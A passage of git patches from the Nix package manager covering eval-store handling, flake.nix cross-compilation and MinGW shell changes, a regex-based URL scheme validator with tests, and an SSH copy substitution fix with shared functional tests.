accumRealisations = [&](const StorePath & inputDrv, const DerivedPathMap::ChildNode & inputNode) { if (!inputNode.value.empty()) { auto outputHashes = - staticOutputHashes(store, store.readDerivation(inputDrv)); + staticOutputHashes(evalStore, evalStore.readDerivation(inputDrv)); for (const auto & outputName : inputNode.value) { auto outputHash = get(outputHashes, outputName); if (!outputHash) @@ -362,7 +365,7 @@ std::map drvOutputReferences( SingleDerivedPath next = SingleDerivedPath::Built { d, outputName }; accumRealisations( // TODO deep resolutions for dynamic derivations, issue #8947, would go here. - resolveDerivedPath(store, next), + resolveDerivedPath(store, next, evalStore_), childNode); } } diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 13e5a1446..2c883ce97 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -943,6 +943,7 @@ const ContentAddress * getDerivationCA(const BasicDerivation & drv); std::map drvOutputReferences( Store & store, const Derivation & drv, - const StorePath & outputPath); + const StorePath & outputPath, + Store * evalStore = nullptr); } diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc index 01da028d8..8e9be14c1 100644 --- a/src/nix-build/nix-build.cc +++ b/src/nix-build/nix-build.cc @@ -462,7 +462,7 @@ static void main_nix_build(int argc, char * * argv) if (dryRun) return; if (shellDrv) { - auto shellDrvOutputs = store->queryPartialDerivationOutputMap(shellDrv.value()); + auto shellDrvOutputs = store->queryPartialDerivationOutputMap(shellDrv.value(), &*evalStore); shell = store->printStorePath(shellDrvOutputs.at("out").value()) + "/bin/bash"; } @@ -515,7 +515,7 @@ static void main_nix_build(int argc, char * * argv) std::function::ChildNode &)> accumInputClosure; accumInputClosure = [&](const StorePath & inputDrv, const DerivedPathMap::ChildNode & inputNode) { - auto outputs = evalStore->queryPartialDerivationOutputMap(inputDrv); + auto outputs = store->queryPartialDerivationOutputMap(inputDrv, &*evalStore); for (auto & i : inputNode.value) { auto o = outputs.at(i); store->computeFSClosure(*o, inputs); @@ -653,7 +653,7 @@ static void main_nix_build(int argc, char * * argv) if (counter) drvPrefix += fmt("-%d", counter + 1); - auto builtOutputs = evalStore->queryPartialDerivationOutputMap(drvPath); + auto builtOutputs = store->queryPartialDerivationOutputMap(drvPath, &*evalStore); auto maybeOutputPath = builtOutputs.at(outputName); assert(maybeOutputPath); diff --git a/tests/functional/ca/eval-store.sh b/tests/functional/ca/eval-store.sh new file mode 100644 index 000000000..9cc499606 --- /dev/null +++ b/tests/functional/ca/eval-store.sh @@ -0,0 +1,10 @@ +#!/usr/bin/env bash + +# Ensure that garbage collection works properly with ca derivations + +source common.sh + +export NIX_TESTS_CA_BY_DEFAULT=1 + +cd .. +source eval-store.sh diff --git a/tests/functional/ca/local.mk b/tests/functional/ca/local.mk index fd87b8d1f..4f86b268f 100644 --- a/tests/functional/ca/local.mk +++ b/tests/functional/ca/local.mk @@ -5,6 +5,7 @@ ca-tests := \ $(d)/concurrent-builds.sh \ $(d)/derivation-json.sh \ $(d)/duplicate-realisation-in-closure.sh \ + $(d)/eval-store.sh \ $(d)/gc.sh \ $(d)/import-derivation.sh \ $(d)/new-build-cmd.sh \ diff --git a/tests/functional/eval-store.sh b/tests/functional/eval-store.sh index 8fc859730..ec99fd953 100644 --- a/tests/functional/eval-store.sh +++ b/tests/functional/eval-store.sh @@ -11,7 +11,16 @@ rm -rf "$eval_store" nix build -f dependencies.nix --eval-store "$eval_store" -o "$TEST_ROOT/result" [[ -e $TEST_ROOT/result/foobar ]] -(! ls $NIX_STORE_DIR/*.drv) +if [[ ! -n "${NIX_TESTS_CA_BY_DEFAULT:-}" ]]; then + # Resolved CA derivations are written to store for building + # + # TODO when we something more systematic + # (https://github.com/NixOS/nix/issues/5025) that distinguishes + # between scratch storage for building and the final destination + # store, we'll be able to make this unconditional again -- resolved + # derivations should only appear in the scratch store. + (! ls $NIX_STORE_DIR/*.drv) +fi ls $eval_store/nix/store/*.drv clearStore @@ -26,5 +35,8 @@ rm -rf "$eval_store" nix-build dependencies.nix --eval-store "$eval_store" -o "$TEST_ROOT/result" [[ -e $TEST_ROOT/result/foobar ]] -(! ls $NIX_STORE_DIR/*.drv) +if [[ ! -n "${NIX_TESTS_CA_BY_DEFAULT:-}" ]]; then + # See above + (! ls $NIX_STORE_DIR/*.drv) +fi ls $eval_store/nix/store/*.drv From 0b81557e2cf30cebb916f82f192f04df38c810d7 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 6 Dec 2023 20:14:14 -0500 Subject: [PATCH 098/654] flake.nix: Put some list items on their own line These things are about to become longer --- flake.nix | 27 +++++++++++++++++++++++---- 1 file changed, 23 insertions(+), 4 deletions(-) diff --git a/flake.nix b/flake.nix index 99480183a..973bb55af 100644 --- a/flake.nix +++ b/flake.nix @@ -36,8 +36,10 @@ systems = linuxSystems ++ darwinSystems; crossSystems = [ - "armv6l-linux" "armv7l-linux" - "x86_64-freebsd13" "x86_64-netbsd" + "armv6l-linux" + "armv7l-linux" + "x86_64-freebsd13" + "x86_64-netbsd" ]; stdenvs = [ "gccStdenv" "clangStdenv" "clang11Stdenv" "stdenv" "libcxxStdenv" "ccacheStdenv" ]; @@ -575,8 +577,25 @@ # to https://nixos.org/nix/install. It downloads the binary # tarball for the user's system and calls the second half of the # installation script. - installerScript = installScriptFor [ "x86_64-linux" "i686-linux" "aarch64-linux" "x86_64-darwin" "aarch64-darwin" "armv6l-linux" "armv7l-linux" ]; - installerScriptForGHA = installScriptFor [ "x86_64-linux" "x86_64-darwin" "armv6l-linux" "armv7l-linux"]; + installerScript = installScriptFor [ + # Native + "x86_64-linux" + "i686-linux" + "aarch64-linux" + "x86_64-darwin" + "aarch64-darwin" + # Cross + "armv6l-linux" + "armv7l-linux" + ]; + installerScriptForGHA = installScriptFor [ + # Native + "x86_64-linux" + "x86_64-darwin" + # Cross + "armv6l-linux" + "armv7l-linux" + ]; # docker image with Nix inside dockerImage = lib.genAttrs linux64BitSystems (system: self.packages.${system}.dockerImage); From f60c2e8a5acabf5fb554f77014904bb0d0c91604 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 6 Dec 2023 20:28:11 -0500 Subject: [PATCH 099/654] flake.nix: `installScriptFor` take tarballs not strings Trying to look up keys in multiple places is not nice, better for the caller to be explicit. --- flake.nix | 32 ++++++++++++++++---------------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/flake.nix b/flake.nix index 973bb55af..185140092 100644 --- a/flake.nix +++ b/flake.nix @@ -256,7 +256,7 @@ ]; }; - installScriptFor = systems: + installScriptFor = tarballs: with nixpkgsFor.x86_64-linux.native; runCommand "installer-script" { buildInputs = [ nix ]; @@ -277,14 +277,14 @@ substitute ${./scripts/install.in} $out/install \ ${pkgs.lib.concatMapStrings - (system: let - tarball = if builtins.elem system crossSystems then self.hydraJobs.binaryTarballCross.x86_64-linux.${system} else self.hydraJobs.binaryTarball.${system}; + (tarball: let + inherit (tarball.stdenv.hostPlatform) system; in '' \ --replace '@tarballHash_${system}@' $(nix --experimental-features nix-command hash-file --base16 --type sha256 ${tarball}/*.tar.xz) \ --replace '@tarballPath_${system}@' $(tarballPath ${tarball}/*.tar.xz) \ '' ) - systems + tarballs } --replace '@nixVersion@' ${version} echo "file installer $out/install" >> $out/nix-support/hydra-build-products @@ -341,7 +341,7 @@ installerClosureInfo = buildPackages.closureInfo { rootPaths = [ nix cacert ]; }; in - buildPackages.runCommand "nix-binary-tarball-${version}" + pkgs.runCommand "nix-binary-tarball-${version}" { #nativeBuildInputs = lib.optional (system != "aarch64-linux") shellcheck; meta.description = "Distribution-independent Nix bootstrap binaries for ${pkgs.system}"; } @@ -579,22 +579,22 @@ # installation script. installerScript = installScriptFor [ # Native - "x86_64-linux" - "i686-linux" - "aarch64-linux" - "x86_64-darwin" - "aarch64-darwin" + self.hydraJobs.binaryTarball."x86_64-linux" + self.hydraJobs.binaryTarball."i686-linux" + self.hydraJobs.binaryTarball."aarch64-linux" + self.hydraJobs.binaryTarball."x86_64-darwin" + self.hydraJobs.binaryTarball."aarch64-darwin" # Cross - "armv6l-linux" - "armv7l-linux" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv6l-linux" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv7l-linux" ]; installerScriptForGHA = installScriptFor [ # Native - "x86_64-linux" - "x86_64-darwin" + self.hydraJobs.binaryTarball."x86_64-linux" + self.hydraJobs.binaryTarball."x86_64-darwin" # Cross - "armv6l-linux" - "armv7l-linux" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv6l-linux" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv7l-linux" ]; # docker image with Nix inside From 78492cfde73d57ca01c73d77a23440754c9e7ee4 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 2 Sep 2023 14:36:25 -0400 Subject: [PATCH 100/654] flake.nix: Use `config` not `system` for cross so we can be a bit more precise --- flake.nix | 20 ++++++++++---------- maintainers/upload-release.pl | 4 ++-- 2 files changed, 12 insertions(+), 12 deletions(-) diff --git a/flake.nix b/flake.nix index 185140092..2f6668b81 100644 --- a/flake.nix +++ b/flake.nix @@ -36,10 +36,10 @@ systems = linuxSystems ++ darwinSystems; crossSystems = [ - "armv6l-linux" - "armv7l-linux" - "x86_64-freebsd13" - "x86_64-netbsd" + "armv6l-unknown-linux-gnueabihf" + "armv7l-unknown-linux-gnueabihf" + "x86_64-unknown-freebsd13" + "x86_64-unknown-netbsd" ]; stdenvs = [ "gccStdenv" "clangStdenv" "clang11Stdenv" "stdenv" "libcxxStdenv" "ccacheStdenv" ]; @@ -116,8 +116,8 @@ inherit system; }; crossSystem = if crossSystem == null then null else { - system = crossSystem; - } // lib.optionalAttrs (crossSystem == "x86_64-freebsd13") { + config = crossSystem; + } // lib.optionalAttrs (crossSystem == "x86_64-unknown-freebsd13") { useLLVM = true; }; overlays = [ @@ -585,16 +585,16 @@ self.hydraJobs.binaryTarball."x86_64-darwin" self.hydraJobs.binaryTarball."aarch64-darwin" # Cross - self.hydraJobs.binaryTarballCross."x86_64-linux"."armv6l-linux" - self.hydraJobs.binaryTarballCross."x86_64-linux"."armv7l-linux" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv6l-unknown-linux-gnueabihf" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv7l-unknown-linux-gnueabihf" ]; installerScriptForGHA = installScriptFor [ # Native self.hydraJobs.binaryTarball."x86_64-linux" self.hydraJobs.binaryTarball."x86_64-darwin" # Cross - self.hydraJobs.binaryTarballCross."x86_64-linux"."armv6l-linux" - self.hydraJobs.binaryTarballCross."x86_64-linux"."armv7l-linux" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv6l-unknown-linux-gnueabihf" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv7l-unknown-linux-gnueabihf" ]; # docker image with Nix inside diff --git a/maintainers/upload-release.pl b/maintainers/upload-release.pl index ebc536f12..4e2c379f0 100755 --- a/maintainers/upload-release.pl +++ b/maintainers/upload-release.pl @@ -154,8 +154,8 @@ downloadFile("binaryTarball.x86_64-linux", "1"); downloadFile("binaryTarball.aarch64-linux", "1"); downloadFile("binaryTarball.x86_64-darwin", "1"); downloadFile("binaryTarball.aarch64-darwin", "1"); -downloadFile("binaryTarballCross.x86_64-linux.armv6l-linux", "1"); -downloadFile("binaryTarballCross.x86_64-linux.armv7l-linux", "1"); +downloadFile("binaryTarballCross.x86_64-linux.armv6l-unknown-linux-gnueabihf", "1"); +downloadFile("binaryTarballCross.x86_64-linux.armv7l-unknown-linux-gnueabihf", "1"); downloadFile("installerScript", "1"); # Upload docker images to dockerhub. From 46b98a40a7c5488a99525bc780b7f7bba0131545 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 2 Sep 2023 14:38:33 -0400 Subject: [PATCH 101/654] flake.nix: Make changes so a MinGW dev shell would work --- flake.nix | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/flake.nix b/flake.nix index 2f6668b81..f0dd9a3e3 100644 --- a/flake.nix +++ b/flake.nix @@ -210,7 +210,7 @@ buildDeps = [ curl - bzip2 xz brotli editline + bzip2 xz brotli openssl sqlite libarchive (pkgs.libgit2.overrideAttrs (attrs: { @@ -219,10 +219,13 @@ cmakeFlags = (attrs.cmakeFlags or []) ++ ["-DUSE_SSH=exec"]; })) boost - lowdown-nix libsodium ] - ++ lib.optionals stdenv.isLinux [libseccomp] + ++ lib.optionals (!stdenv.hostPlatform.isWindows) [ + editline + lowdown-nix + ] + ++ lib.optional stdenv.isLinux libseccomp ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid; checkDeps = [ @@ -510,7 +513,7 @@ stdenv = currentStdenv; }; - meta.platforms = lib.platforms.unix; + meta.platforms = lib.platforms.unix ++ lib.platforms.windows; meta.mainProgram = "nix"; }); From b892161e314d976e7692ffcf487e1aa042165745 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 11 Dec 2023 12:26:42 -0500 Subject: [PATCH 102/654] flake.nix: Make a MinGW dev shell This requires a `shellCrossSystems` for now, since Nix doesn't actually build on Windows. This can be dropped once it does. --- flake.nix | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/flake.nix b/flake.nix index f0dd9a3e3..bbdfc38e9 100644 --- a/flake.nix +++ b/flake.nix @@ -42,6 +42,13 @@ "x86_64-unknown-netbsd" ]; + # Nix doesn't yet build on this platform, so we put it in a + # separate list. We just use this for `devShells` and + # `nixpkgsFor`, which this depends on. + shellCrossSystems = crossSystems ++ [ + "x86_64-w64-mingw32" + ]; + stdenvs = [ "gccStdenv" "clangStdenv" "clang11Stdenv" "stdenv" "libcxxStdenv" "ccacheStdenv" ]; forAllSystems = lib.genAttrs systems; @@ -129,7 +136,7 @@ in { inherit stdenvs native; static = native.pkgsStatic; - cross = forAllCrossSystems (crossSystem: make-pkgs crossSystem "stdenv"); + cross = lib.genAttrs shellCrossSystems (crossSystem: make-pkgs crossSystem "stdenv"); }); commonDeps = @@ -808,7 +815,7 @@ in (makeShells "native" nixpkgsFor.${system}.native) // (makeShells "static" nixpkgsFor.${system}.static) // - (forAllCrossSystems (crossSystem: let pkgs = nixpkgsFor.${system}.cross.${crossSystem}; in makeShell pkgs pkgs.stdenv)) // + (lib.genAttrs shellCrossSystems (crossSystem: let pkgs = nixpkgsFor.${system}.cross.${crossSystem}; in makeShell pkgs pkgs.stdenv)) // { default = self.devShells.${system}.native-stdenvPackages; } From 589fb105f311af65230d374cbbddf7173c7ad103 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= Date: Tue, 12 Dec 2023 16:05:32 +0100 Subject: [PATCH 103/654] Fix the VM tests Work around https://github.com/NixOS/nixpkgs/issues/271146 until we can depend on a Nixpkgs version containing https://github.com/NixOS/nixpkgs/pull/271423 --- flake.nix | 4 ++++ tests/nixos/default.nix | 1 + 2 files changed, 5 insertions(+) diff --git a/flake.nix b/flake.nix index bbdfc38e9..ada52c05d 100644 --- a/flake.nix +++ b/flake.nix @@ -7,6 +7,10 @@ # Also, do not grab arbitrary further staging commits. This PR was # carefully made to be based on release-23.05 and just contain # rebuild-causing changes to packages that Nix actually uses. + # + # Once this is updated to something containing + # https://github.com/NixOS/nixpkgs/pull/271423, don't forget + # to remove the `nix.checkAllErrors = false;` line in the tests. inputs.nixpkgs.url = "github:NixOS/nixpkgs/staging-23.05"; inputs.nixpkgs-regression.url = "github:NixOS/nixpkgs/215d4d0fd80ca5163643b03a33fde804a29cc1e2"; inputs.lowdown-src = { url = "github:kristapsdz/lowdown"; flake = false; }; diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix index 4459aa664..2645cac8e 100644 --- a/tests/nixos/default.nix +++ b/tests/nixos/default.nix @@ -10,6 +10,7 @@ let hostPkgs = nixpkgsFor.${system}.native; defaults = { nixpkgs.pkgs = nixpkgsFor.${system}.native; + nix.checkAllErrors = false; }; _module.args.nixpkgs = nixpkgs; }; From 2e451a663eff96b89360cfd3c0d5eaa60ca46181 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 12 Dec 2023 17:22:54 +0100 Subject: [PATCH 104/654] schemeRegex -> schemeNameRegex Scheme could be understood to include the typical `:` separator. --- src/libutil/url-parts.hh | 2 +- src/libutil/url.cc | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/src/libutil/url-parts.hh b/src/libutil/url-parts.hh index 5c5a30dc2..07bc8d0cd 100644 --- a/src/libutil/url-parts.hh +++ b/src/libutil/url-parts.hh @@ -8,7 +8,7 @@ namespace nix { // URI stuff. const static std::string pctEncoded = "(?:%[0-9a-fA-F][0-9a-fA-F])"; -const static std::string schemeRegex = "(?:[a-z][a-z0-9+.-]*)"; +const static std::string schemeNameRegex = "(?:[a-z][a-z0-9+.-]*)"; const static std::string ipv6AddressSegmentRegex = "[0-9a-fA-F:]+(?:%\\w+)?"; const static std::string ipv6AddressRegex = "(?:\\[" + ipv6AddressSegmentRegex + "\\]|" + ipv6AddressSegmentRegex + ")"; const static std::string unreservedRegex = "(?:[a-zA-Z0-9-._~])"; diff --git a/src/libutil/url.cc b/src/libutil/url.cc index f2d5f1782..e9acd67d0 100644 --- a/src/libutil/url.cc +++ b/src/libutil/url.cc @@ -14,7 +14,7 @@ std::regex revRegex(revRegexS, std::regex::ECMAScript); ParsedURL parseURL(const std::string & url) { static std::regex uriRegex( - "((" + schemeRegex + "):" + "((" + schemeNameRegex + "):" + "(?:(?://(" + authorityRegex + ")(" + absPathRegex + "))|(/?" + pathRegex + ")))" + "(?:\\?(" + queryRegex + "))?" + "(?:#(" + queryRegex + "))?", From 4eaeda6604e2f8977728f14415fe92350d047970 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 12 Dec 2023 17:43:54 +0100 Subject: [PATCH 105/654] isValidSchemeName: Use regex As requested by Eelco Dolstra. I think it used to be simpler. --- src/libutil/url.cc | 15 +++------------ tests/unit/libutil/url.cc | 5 +++++ 2 files changed, 8 insertions(+), 12 deletions(-) diff --git a/src/libutil/url.cc b/src/libutil/url.cc index e9acd67d0..152c06d8e 100644 --- a/src/libutil/url.cc +++ b/src/libutil/url.cc @@ -3,7 +3,6 @@ #include "util.hh" #include "split.hh" #include "canon-path.hh" -#include "string.hh" namespace nix { @@ -187,17 +186,9 @@ std::string fixGitURL(const std::string & url) // https://www.rfc-editor.org/rfc/rfc3986#section-3.1 bool isValidSchemeName(std::string_view s) { - if (s.empty()) return false; - if (!isASCIIAlpha(s[0])) return false; - for (auto c : s.substr(1)) { - if (isASCIIAlpha(c)) continue; - if (isASCIIDigit(c)) continue; - if (c == '+') continue; - if (c == '-') continue; - if (c == '.') continue; - return false; - } - return true; + static std::regex regex(schemeNameRegex, std::regex::ECMAScript); + + return std::regex_match(s.begin(), s.end(), regex, std::regex_constants::match_default); } } diff --git a/tests/unit/libutil/url.cc b/tests/unit/libutil/url.cc index 09fa4e218..7d08f467e 100644 --- a/tests/unit/libutil/url.cc +++ b/tests/unit/libutil/url.cc @@ -360,6 +360,11 @@ TEST(nix, isValidSchemeName) { ASSERT_FALSE(isValidSchemeName(".file")); ASSERT_FALSE(isValidSchemeName("-file")); ASSERT_FALSE(isValidSchemeName("1file")); + // regex ok? + ASSERT_FALSE(isValidSchemeName("\nhttp")); + ASSERT_FALSE(isValidSchemeName("\nhttp\n")); + ASSERT_FALSE(isValidSchemeName("http\n")); + ASSERT_FALSE(isValidSchemeName("http ")); } } From 0b87ba50c08d83384e11a8e6db1e2f97fba4b61c Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 12 Dec 2023 17:44:53 +0100 Subject: [PATCH 106/654] Revert "Add nix::isASCII*, locale-independent" This reverts commit 79eb2920bb51c7ec9528a403986e79f04738e2be. Not used at this time. --- src/libutil/string.hh | 17 ----------- tests/unit/libutil/string.cc | 59 ------------------------------------ 2 files changed, 76 deletions(-) delete mode 100644 src/libutil/string.hh delete mode 100644 tests/unit/libutil/string.cc diff --git a/src/libutil/string.hh b/src/libutil/string.hh deleted file mode 100644 index 16ef75643..000000000 --- a/src/libutil/string.hh +++ /dev/null @@ -1,17 +0,0 @@ -#pragma once - -namespace nix { - - /** Locale-independent version of std::islower(). */ - inline bool isASCIILower(char c) { return c >= 'a' && c <= 'z'; }; - - /** Locale-independent version of std::isupper(). */ - inline bool isASCIIUpper(char c) { return c >= 'A' && c <= 'Z'; }; - - /** Locale-independent version of std::isalpha(). */ - inline bool isASCIIAlpha(char c) { return isASCIILower(c) || isASCIIUpper(c); }; - - /** Locale-independent version of std::isdigit(). */ - inline bool isASCIIDigit(char c) { return c >= '0' && c <= '9'; }; - -} diff --git a/tests/unit/libutil/string.cc b/tests/unit/libutil/string.cc deleted file mode 100644 index 381f2cc15..000000000 --- a/tests/unit/libutil/string.cc +++ /dev/null @@ -1,59 +0,0 @@ -#include -#include "string.hh" - -namespace nix { - -TEST(string, isASCIILower) { - ASSERT_TRUE(isASCIILower('a')); - ASSERT_TRUE(isASCIILower('z')); - ASSERT_FALSE(isASCIILower('A')); - ASSERT_FALSE(isASCIILower('Z')); - ASSERT_FALSE(isASCIILower('0')); - ASSERT_FALSE(isASCIILower('9')); - ASSERT_FALSE(isASCIILower(' ')); - ASSERT_FALSE(isASCIILower('\n')); - ASSERT_FALSE(isASCIILower('\t')); - ASSERT_FALSE(isASCIILower(':')); -} - -TEST(string, isASCIIUpper) { - ASSERT_FALSE(isASCIIUpper('a')); - ASSERT_FALSE(isASCIIUpper('z')); - ASSERT_TRUE(isASCIIUpper('A')); - ASSERT_TRUE(isASCIIUpper('Z')); - ASSERT_FALSE(isASCIIUpper('0')); - ASSERT_FALSE(isASCIIUpper('9')); - ASSERT_FALSE(isASCIIUpper(' ')); - ASSERT_FALSE(isASCIIUpper('\n')); - ASSERT_FALSE(isASCIIUpper('\t')); - ASSERT_FALSE(isASCIIUpper(':')); -} - -TEST(string, isASCIIAlpha) { - ASSERT_TRUE(isASCIIAlpha('a')); - ASSERT_TRUE(isASCIIAlpha('z')); - ASSERT_TRUE(isASCIIAlpha('A')); - ASSERT_TRUE(isASCIIAlpha('Z')); - ASSERT_FALSE(isASCIIAlpha('0')); - ASSERT_FALSE(isASCIIAlpha('9')); - ASSERT_FALSE(isASCIIAlpha(' ')); - ASSERT_FALSE(isASCIIAlpha('\n')); - ASSERT_FALSE(isASCIIAlpha('\t')); - ASSERT_FALSE(isASCIIAlpha(':')); -} - -TEST(string, isASCIIDigit) { - ASSERT_FALSE(isASCIIDigit('a')); - ASSERT_FALSE(isASCIIDigit('z')); - ASSERT_FALSE(isASCIIDigit('A')); - ASSERT_FALSE(isASCIIDigit('Z')); - ASSERT_TRUE(isASCIIDigit('0')); - ASSERT_TRUE(isASCIIDigit('1')); - ASSERT_TRUE(isASCIIDigit('9')); - ASSERT_FALSE(isASCIIDigit(' ')); - ASSERT_FALSE(isASCIIDigit('\n')); - ASSERT_FALSE(isASCIIDigit('\t')); - ASSERT_FALSE(isASCIIDigit(':')); -} - -} \ No newline at end of file From 04f454f2a0e1bfb4fc0368872f215cb690df11bc Mon Sep 17 00:00:00 2001 From: SharzyL Date: Wed, 13 Dec 2023 10:30:28 +0800 Subject: [PATCH 107/654] fix: nix copy ssh-ng:// not respecting --substitute-on-destination --- src/libstore/remote-store.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc index cc26c2a94..dd6347468 100644 --- a/src/libstore/remote-store.cc +++ b/src/libstore/remote-store.cc @@ -225,7 +225,7 @@ StorePathSet RemoteStore::queryValidPaths(const StorePathSet & paths, Substitute conn->to << WorkerProto::Op::QueryValidPaths; WorkerProto::write(*this, *conn, paths); if (GET_PROTOCOL_MINOR(conn->daemonVersion) >= 27) { - conn->to << (settings.buildersUseSubstitutes ? 1 : 0); + conn->to << maybeSubstitute; } conn.processStderr(); return WorkerProto::Serialise::read(*this, *conn); From cc3913e4584beb19e7af00572db119d2638333d5 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 13 Dec 2023 13:27:23 +0100 Subject: [PATCH 108/654] Remove unused variable --- src/libexpr/eval.hh | 5 ----- 1 file changed, 5 deletions(-) diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index f3f6d35b9..f452dcb9f 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -335,11 +335,6 @@ private: std::map> searchPathResolved; - /** - * Cache used by checkSourcePath(). - */ - std::unordered_map resolvedPaths; - /** * Cache used by prim_match(). */ From 103ca0bde5d4f32745d4c3aee534cf4aa0a69a9d Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 13 Dec 2023 13:27:29 +0100 Subject: [PATCH 109/654] Improve SourcePath display --- src/libfetchers/input-accessor.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libfetchers/input-accessor.hh b/src/libfetchers/input-accessor.hh index d5ac238b1..f385e6231 100644 --- a/src/libfetchers/input-accessor.hh +++ b/src/libfetchers/input-accessor.hh @@ -130,7 +130,7 @@ struct SourcePath { return accessor->getPhysicalPath(path); } std::string to_string() const - { return path.abs(); } + { return accessor->showPath(path); } /** * Append a `CanonPath` to this path. From faa4cae9aed4e9f8c40ed8c6fe00bd0216c3b0ea Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 13 Dec 2023 13:27:39 +0100 Subject: [PATCH 110/654] LibExprTest: Ignore $NIX_PATH Otherwise a broken $NIX_PATH can cause the test suite to fail. --- tests/unit/libexpr-support/tests/libexpr.hh | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tests/unit/libexpr-support/tests/libexpr.hh b/tests/unit/libexpr-support/tests/libexpr.hh index 968431446..d720cedde 100644 --- a/tests/unit/libexpr-support/tests/libexpr.hh +++ b/tests/unit/libexpr-support/tests/libexpr.hh @@ -8,6 +8,7 @@ #include "nixexpr.hh" #include "eval.hh" #include "eval-inline.hh" +#include "eval-settings.hh" #include "store-api.hh" #include "tests/libstore.hh" @@ -18,6 +19,7 @@ namespace nix { static void SetUpTestSuite() { LibStoreTest::SetUpTestSuite(); initGC(); + evalSettings.nixPath = {}; } protected: From 19ec1c9fd4d4bf6e941b046b8549ba2a1a690937 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 13 Dec 2023 15:15:30 +0100 Subject: [PATCH 111/654] Improve the unsafeGetAttrPos test We can use corepkgsFS->addFile() now to create a "real" position. --- tests/unit/libexpr/primops.cc | 23 ++++++++++++++++++++--- 1 file changed, 20 insertions(+), 3 deletions(-) diff --git a/tests/unit/libexpr/primops.cc b/tests/unit/libexpr/primops.cc index 7485fa0d0..384d9924b 100644 --- a/tests/unit/libexpr/primops.cc +++ b/tests/unit/libexpr/primops.cc @@ -1,6 +1,8 @@ #include #include +#include "memory-input-accessor.hh" + #include "tests/libexpr.hh" namespace nix { @@ -148,10 +150,25 @@ namespace nix { } TEST_F(PrimOpTest, unsafeGetAttrPos) { - // The `y` attribute is at position - const char* expr = "builtins.unsafeGetAttrPos \"y\" { y = \"x\"; }"; + state.corepkgsFS->addFile(CanonPath("foo.nix"), "{ y = \"x\"; }"); + + auto expr = "builtins.unsafeGetAttrPos \"y\" (import )"; auto v = eval(expr); - ASSERT_THAT(v, IsNull()); + ASSERT_THAT(v, IsAttrsOfSize(3)); + + auto file = v.attrs->find(createSymbol("file")); + ASSERT_NE(file, nullptr); + ASSERT_THAT(*file->value, IsString()); + auto s = baseNameOf(file->value->string_view()); + ASSERT_EQ(s, "foo.nix"); + + auto line = v.attrs->find(createSymbol("line")); + ASSERT_NE(line, nullptr); + ASSERT_THAT(*line->value, IsIntEq(1)); + + auto column = v.attrs->find(createSymbol("column")); + ASSERT_NE(column, nullptr); + ASSERT_THAT(*column->value, IsIntEq(3)); } TEST_F(PrimOpTest, hasAttr) { From e76df8781417dad9ab4f0a6c3b28917e35f204bf Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 13 Dec 2023 11:26:14 -0500 Subject: [PATCH 112/654] Test `nix copy --substitute-on-destination` It works with both `ssh://` and `ssh-ng://` now since #9600 (and `ssh-ng:// didn't work before that). Also, by making the two tests share code, we nudge ourselves towards making sure there is feature parity. --- tests/functional/nix-copy-ssh-common.sh | 70 +++++++++++++++++++++++++ tests/functional/nix-copy-ssh-ng.sh | 16 +++--- tests/functional/nix-copy-ssh.sh | 19 +------ 3 files changed, 77 insertions(+), 28 deletions(-) create mode 100644 tests/functional/nix-copy-ssh-common.sh diff --git a/tests/functional/nix-copy-ssh-common.sh b/tests/functional/nix-copy-ssh-common.sh new file mode 100644 index 000000000..cc8314ff7 --- /dev/null +++ b/tests/functional/nix-copy-ssh-common.sh @@ -0,0 +1,70 @@ +proto=$1 +shift +(( $# == 0 )) + +clearStore +clearCache + +mkdir -p $TEST_ROOT/stores + +# Create path to copy back and forth +outPath=$(nix-build --no-out-link dependencies.nix) + +storeQueryParam="store=${NIX_STORE_DIR}" + +realQueryParam () { + echo "real=$1$NIX_STORE_DIR" +} + +remoteRoot="$TEST_ROOT/stores/$proto" + +clearRemoteStore () { + chmod -R u+w "$remoteRoot" || true + rm -rf "$remoteRoot" +} + +clearRemoteStore + +remoteStore="${proto}://localhost?${storeQueryParam}&remote-store=${remoteRoot}%3f${storeQueryParam}%26$(realQueryParam "$remoteRoot")" + +# Copy to store + +args=() +if [[ "$proto" == "ssh-ng" ]]; then + # TODO investigate discrepancy + args+=(--no-check-sigs) +fi + +[ ! -f ${remoteRoot}${outPath}/foobar ] +nix copy "${args[@]}" --to "$remoteStore" $outPath +[ -f 